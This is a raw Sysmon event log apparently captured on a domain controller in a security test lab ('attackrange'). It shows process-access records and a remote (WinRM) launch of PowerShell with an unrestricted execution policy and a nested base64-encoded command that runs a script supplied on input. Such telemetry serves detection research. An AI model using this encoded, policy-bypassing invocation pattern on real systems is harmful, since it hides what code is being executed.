BHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000005691Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005690Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005689Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005688Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005687Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005686Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005685Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005684Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005683Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005682Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005681Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005680Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005679Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-85A6-5FCF-EF00-000000009101}41484660C:\Windows\system32\WinrsHost.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000005678Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.137{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000005677Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005676Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005675Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005674Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.125{10ACEC4A-8541-5FCF-1500-000000009101}13644128C:\Windows\system32\svchost.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsms